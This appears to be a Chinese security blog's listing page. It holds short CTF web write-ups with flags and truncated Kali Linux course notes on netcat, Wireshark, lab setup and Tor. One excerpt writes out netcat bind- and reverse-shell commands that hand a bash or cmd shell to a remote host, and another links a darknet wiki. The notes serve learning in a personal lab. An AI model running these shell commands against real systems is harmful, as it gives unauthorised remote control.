这题不是WEB(100)

0x00
题目地址:chinalover.sinaapp.com/web2/index.html

0x01
解题思路:
这题看了源码:

1
2
3
4
5
6
7
<html>
    <title>你是在坑我?</title>
    <body>
    答案又是啥。。
    <img src="2.gif" width="100" height="100" />
    </body>
</html>

并没有发现可以得到flag的地方,唯一有可疑的,就是这题中给的这个图片,那不用说了,直接抓包,看看能不能发现什么

0x02
方法一:
使用工具:burpsuite
请求下刚刚页面中的2.gif图片
请求包头为:

1
2
3
GET <strong>/web2/2.gif</strong> HTTP/1.1
Host: chinalover.sinaapp.com
.........


很快,返回了内容,右边就是返回的图片数据,拉到最底下,果然,flag就在这里。

0x03
方法二:
直接使用[……]

阅读全文

签到2(50)

0x00
题目地址:http://teamxlc.sinaapp.com/web1/02298884f0724c04293b4d8c0178615e/index.php

0x01
解题思路:
这道题也不难,但是需要了解input标签限制字符长度的属性:maxlength。

1
2
3
4
5
6
7
8
<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
尚未登录或口令错误<form action="./index.php" method="post">
    <p>输入框:<input type="password" value="" name="text1" maxlength="10"><br>
    请输入口令:zhimakaimen
    <input type="submit" value="开门">
</form>
</html>

将源码中的maxlength的值10,改为大于需要输入的字符长度11就可以提交拿到flag。
所以flag是:nctf{follow_me_to_exploit}

签到题(50)

0x00
题目地址:http://chinalover.sinaapp.com/web1/

0x01
解题思路:
这题十分简单,只需要查看源码就能找到flag.

1
2
3
4
5
6
7
8
9
10
<html>
    <title>key在哪里?</title>
    <head>
        <meta http-equiv="content-type" content="text/html;charset=utf-8">
        <a style="display:none">nctf{flag_admiaanaaaaaaaaaaa}</a>
    </head>
    <body>
    key在哪里?
    </body>
</html>

所以flag就是:nctf{flag_admiaanaaaaaaaaaaa}

12.kali linux_基本工具-远程控制、NCAT、WIRESHARK、WIRESHARK-筛选器、常见协议

课时12 基本工具-远程控制、NCAT、WIRESHARK、WIRESHARK-筛选器、常见协议
NC—–远程控制
正向:
A: n  -lp 333 –  bash
B: n  1.1.1.1 333
反向:
A: nc -lp 333
B: nc 1.1.1.1 333 -c bash

注:Windows用户把bash改成cmd;

root@kali:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:c6:89:56
inet addr:192.168.198.130  Bcast:[……]

阅读全文

11.kali linux_基本工具-NETCAT(传输文件|目录、流媒体服务、端口扫描、远程克隆硬盘)

课时11 基本工具-NETCAT(传输文件/目录、流媒体服务、端口扫描、远程克隆硬盘)

NC—-传输文件/目录
传输文件
A: nc -lp 333 > 1.mp4
B: nc -nv 1.1.1.1. 333 < 1.mp4 – q 1

A: nc -q -lp 333 < a.mp4
B: nc -nv 1.1.1.1 333 > 2.mp4
传输目录
A: tar -cvf – music/ | nc -lp 333 – q 1
B: nc -nv 1.1.1.1 333 | tar -xvf –
加密传文件
A: nc -lp[……]

阅读全文

10.kali linux_基本工具-NETCAT(telnet|banner、传输文本信息)

课时10 基本工具-NETCAT(telnet/banner、传输文本信息)

常用工具

经常使用且功能强大
安全从业者必不可少的帮手
Nc / ncat
Wireshack
Tcpdump

NETCAT—–NC
网络工具中的瑞士军刀——小身材、大智慧
侦听模式/传输模式
telnet/获取banner信息
传输文本信息
传输文件目录
加密传输文件
远程控制/木马
加密所有流量
流媒体服务器
远程克隆硬盘

NC—–TELNET/banner
nc -nv 1.1.1.1 10
nc -nv 1.1.1.1 25
nc -nv[……]

阅读全文

9.kali linux_实验环境

准备实验环境
渗透非授权系统的弊端
搭建自己的实验环境

安装虚拟机
微软最新版软件
http://msdn .microsoft.com/en-ca/subscriptions/aa336858
windows虚拟机
http://dev.modern.ie/tools/vms/
安装自己的虚拟机
Xp
Win7
2003

选择”Download software”

linux虚拟机
http://www.turnkeylinux.org
Ubuntu
Lamp安装
Metasploitable2
http://downloads.metas[……]

阅读全文

8.kali linux_TOR

保护隐私防止被追踪
志愿者组成
长期在天朝完全无法使用
感谢 云
暗网
互联网搜索引擎无法发现
互联网黑市
下载和看视频是不道德的行为

互联网黑市交易的货币是比特币
比特币很难在互联网复原

下载
http://www.torproject.org/download/download-easy.html.en#linux
http://pan.baidu.com/s/1sjkdPO5
问题1:should not be run as root;
问题2:服务启动错误
a
暗网wiki
http://zqktlwi4fecv6ri.onion/wiki/i[……]

阅读全文

6.kali linux_安装java、安装显卡驱动、安装网卡补丁、并发线程、电源优化

下载
http://java.sun.com/javase/downloads/index.jsp
解包拷贝
tar-xzvf /root/jdk-7u45-linux-x64.tar.gz
mv jdk1.7.0_45/opt
cd/opt/jdk1.7.0_45
安装注册
update-alternatives –install /usr/bin/java java/opt/jdk1.7.0_45/bin/java 1
update-alternatives –install /usr/bin/javac javac/opt/jdk1.7.0_45/bin/javac[……]

阅读全文